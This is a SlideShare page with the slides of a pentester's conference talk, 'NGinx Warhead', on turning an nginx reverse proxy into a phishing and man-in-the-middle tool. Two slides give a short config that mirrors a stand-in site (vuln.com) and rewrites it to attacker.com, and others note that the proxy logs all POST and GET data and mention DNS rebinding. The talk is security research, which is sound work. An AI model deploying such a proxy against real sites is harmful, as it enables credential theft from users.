Sergey Belov - NGinx Warhead

1,950 views

Published on

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,950
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
5
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Sergey Belov - NGinx Warhead

  1. 1. Sergey Belov
  2. 2. • Pentester in Digital Security / ERPScan; • Writer (habrahabr.ru, “Xakep”); • CTF Player; • Bug bounty member (Google, Yandex); • bugscollector.com creator.
  3. 3. • Very easy • 0$ • Not mentioned in the wild
  4. 4. NGinx – reverse proxy
  5. 5. php-fpm Client Nginx Apache
  6. 6. attacker.com Client php-fpm Nginx Apache vuln.com ??? http server
  7. 7. Step 1 location / { proxy_pass http://vuln.com; proxy_set_header X-Real-IP $remote_addr; } }
  8. 8. Step 2    proxy_set_header Host “vuln.com"; sub_filter ‘vuln.com' ‘attacker.com'; sub_filter_once off;
  9. 9. Phishing
  10. 10. NGinx – tool for MitM/phishing?      + Identical design + Fully functional working + Logging all data (POST/GET) + Add custom JS/HTML - Another domain (DNS poising / router hacking, malware, evil apn config e.t.c.)
  11. 11. Pentest  Random exploit’s?  Change response data (rights of social networks apps)  Change apps swf -> java (exploit)  ???
  12. 12. DNS rebinding
  13. 13. • -Another domain • - Very unstable • + Can attack internal resources
  14. 14. Internal, not external!
  15. 15. C:UsersBeLove>ping www.ya.ru Обмен пакетами с ya.ru [87.250.250.203] с 32 байтами данных
  16. 16. Remove it from: • Pentester’s reports • Most famous security scanners
  17. 17. Thanks! demo: http://zn.sergeybelove.ru http://twitter.com/sergeybelove

×